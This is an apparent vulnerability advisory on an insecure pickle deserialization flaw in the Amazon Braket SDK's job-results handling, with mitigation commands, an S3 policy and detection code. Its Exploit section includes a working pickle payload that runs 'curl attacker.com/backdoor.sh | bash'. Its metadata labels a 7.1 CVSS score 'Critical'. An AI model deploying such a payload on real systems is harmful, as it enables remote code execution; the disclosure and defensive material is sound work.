How CVE-2026-9291 Works
Amazon Braket SDK is an open-source Python library for interacting with the Amazon Braket quantum computing service, including managing hybrid quantum jobs and retrieving job results. The vulnerability stems from insecure deserialization (CWE-502) in the job results processing component.
The SDK’s `deserialize_values()` function reads the `dataFormat` field directly from the job results JSON file (results.json) stored in an S3 bucket without validation. Under normal operation, this field is set to PLAINTEXT, and the SDK safely processes the data. However, the SDK also supports a `pickled_v4` format, which triggers Python’s `pickle.loads()` to deserialize the data payload.
An attacker with S3 write access to a victim’s Braket job output bucket can exploit this by:
1. Modifying the `dataFormat` field in `results.json` from `PLAINTEXT` to `pickled_v4`
2. Replacing the `dataDictionary` values with base64-encoded malicious Python pickle payloads
3. When the victim calls `job.result()`, `load_job_result()`, or `load_job_checkpoint()` as part of their normal Braket workflow, the SDK calls `pickle.loads()` on the attacker-controlled data
This executes arbitrary code with the victim’s permissions on any machine that processes the job results. The attack requires minimal privileges beyond S3 write access, making it accessible to attackers who have already gained some level of system access.
The vulnerability affects all versions from v1.10.0 up to but not including v1.117.0. It was patched in version 1.117.0 released on May 22, 2026.
DailyCVE Form:
Platform: Amazon Braket SDK
Version: >= v1.10.0, < v1.117.0
Vulnerability: Insecure Deserialization (CWE-502)
Severity: Critical (CVSS 3.1: 7.1)
Date: 2026-05-22
Prediction: Patch expected May 22, 2026
What Undercode Say:
Analytics
The vulnerability represents a significant security risk that can be exploited by remote authenticated attackers who possess S3 write access to job output buckets. The flaw stems from the SDK’s improper handling of serialized data during job result processing, creating an attack surface where maliciously crafted serialized objects can be executed on systems processing these results. This attack vector is particularly dangerous because it leverages legitimate SDK functionality while exploiting the trust relationship between the SDK and the serialized data it processes. The vulnerability falls under the ATT&CK technique T1203 for Exploitation for Execution.
Bash Commands & Code
Check installed version:
```bash
pip show amazon-braket-sdk | grep Version
```
Upgrade to patched version (the requirement is quoted so the shell does not treat `>` as a redirect):
```bash
pip install --upgrade "amazon-braket-sdk>=1.117.0"
```
Verify S3 bucket permissions (audit):
```bash
aws s3api get-bucket-policy --bucket YOUR_BRAKET_OUTPUT_BUCKET
```
Restrict S3 write access (least privilege):
```bash
aws s3api put-bucket-policy --bucket YOUR_BRAKET_OUTPUT_BUCKET --policy file://policy.json
```
Example policy.json:
```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Deny",
      "Principal": "*",
      "Action": "s3:PutObject",
      "Resource": "arn:aws:s3:::YOUR_BRAKET_OUTPUT_BUCKET/*",
      "Condition": {
        "StringNotEquals": {
          "aws:PrincipalArn": "arn:aws:iam::YOUR_ACCOUNT:role/TRUSTED_ROLE"
        }
      }
    }
  ]
}
```
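Validate dataFormat before processing (workaround):
```python
import json

import boto3


def safe_load_result(bucket, s3_key, process_result):
    # Fetch results.json from S3
    obj = boto3.client("s3").get_object(Bucket=bucket, Key=s3_key)
    results_json_content = obj["Body"].read()
    data = json.loads(results_json_content)
    if data.get("dataFormat") == "pickled_v4":
        # Refuse to process unless pickle was explicitly configured
        raise ValueError("Untrusted pickled_v4 format detected")
    # Proceed with safe processing; process_result is the caller's own handler
    return process_result(data)
```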
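An added triage example, not code from the original post or from the Braket SDK: rather than only refusing `pickled_v4`, it allowlists the format and, for pickled entries, walks the pickle opcodes with `pickletools.genops` (which never unpickles anything) to report what each value would import or call. The function names, the verdict strings and the case-insensitive format match are assumptions, and the sample documents are constructed with harmless values.

```python
import base64
import json
import pickle
import pickletools

CALL_OPS = {"REDUCE", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX", "BUILD"}
STRING_OPS = {"UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}


def pickle_imports(blob):
    """Walk opcodes only (nothing is unpickled); return (imports, calls)."""
    strings, imports, calls = [], [], False
    for op, arg, _pos in pickletools.genops(blob):
        if op.name in STRING_OPS:
            strings.append(arg)
        elif op.name in ("GLOBAL", "INST"):
            imports.append(tuple(arg.split(" ", 1)))
        elif op.name == "STACK_GLOBAL":
            # Heuristic: protocol 4 pushes module and name as the two prior strings.
            imports.append(tuple(strings[-2:]))
        calls = calls or op.name in CALL_OPS
    return imports, calls


def triage_results(results_json_text):
    """Return (verdict, findings) for the text of one results.json."""
    doc = json.loads(results_json_text)
    fmt = str(doc.get("dataFormat", "")).lower()  # assumption: case-insensitive match
    if fmt == "plaintext":
        return "ok", {}
    if fmt != "pickled_v4":
        return "reject-unknown-format", {}
    findings = {}
    for key, value in doc.get("dataDictionary", {}).items():
        try:
            findings[key] = pickle_imports(base64.b64decode(value))
        except Exception as exc:  # malformed base64 or truncated pickle stream
            findings[key] = ([("<unparseable>", type(exc).__name__)], True)
    return "quarantine-pickled", findings


def _b64(obj):
    return base64.b64encode(pickle.dumps(obj, protocol=4)).decode()


# Constructed sample documents; both pickled values are harmless.
SAMPLE_PLAIN = json.dumps({"dataFormat": "PLAINTEXT", "dataDictionary": {"energy": -1.1}})
SAMPLE_PICKLED = json.dumps({"dataFormat": "pickled_v4", "dataDictionary": {
    "energy": _b64(-1.1), "steps": _b64(range(3))}})
```

A non-empty import list or a call flag is not proof of tampering, since legitimately pickled objects such as NumPy arrays also import and call constructors; compare the reported modules against what the job actually saved.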
Exploit:
An attacker with S3 write access to the victim’s Braket job output bucket can:
1. Locate the target `results.json` file in the victim’s S3 output bucket
2. Modify the JSON by changing `"dataFormat": "PLAINTEXT"` to `"dataFormat": "pickled_v4"`
3. Replace data payload with a base64-encoded malicious pickle object
4. Wait for the victim to call `job.result()`, `load_job_result()`, or `load_job_checkpoint()`
5. Achieve RCE when the SDK executes `pickle.loads()` on the malicious payload
Example malicious payload generation:
```python
import pickle
import base64
import os

class Exploit:
    def __reduce__(self):
        return (os.system, ('curl attacker.com/backdoor.sh | bash',))

payload = base64.b64encode(pickle.dumps(Exploit())).decode()
# Insert payload into dataDictionary of results.json
```
The attacker gains code execution with the victim’s permissions on any machine that processes the job results.
Protection:
Primary Mitigation:
- Upgrade to amazon-braket-sdk version 1.117.0 or later immediately
Workarounds (if unable to upgrade immediately):
- Restrict S3 bucket policies on Braket job output buckets to enforce least-privilege access, ensuring only trusted principals have `s3:PutObject` permissions
- Validate the `dataFormat` field in job result metadata before calling `job.result()` and refuse to process results where the format is `pickled_v4` unless pickle serialization was explicitly configured
- Implement monitoring for suspicious S3 bucket activities and consider restricting write permissions to job output buckets
Recommended Security Practices:
- Update the SDK/fork so results processing validates the `dataFormat` field and refuses to deserialize `pickled_v4` unless explicitly configured
- Ensure the SDK no longer calls `pickle.loads()` on actor-controlled results without proper validation
Impact:
- Arbitrary Code Execution: Attackers can execute arbitrary code on any machine that processes Braket job results
- Full System Compromise: Enables attackers to gain full control over systems processing Braket job results
- Data Exfiltration: Leads to potential data theft from compromised systems
- Lateral Movement: Enables network infiltration and lateral movement within infrastructure
- Widespread Risk: Affects any machine that processes job results through affected SDK versions across distributed computing environments
- Production Impact: Organizations using the SDK in production face significant risk of unauthorized access and potential system compromise
For security questions or concerns, contact AWS Security at [email protected].
Sources:
Reported By: github.com

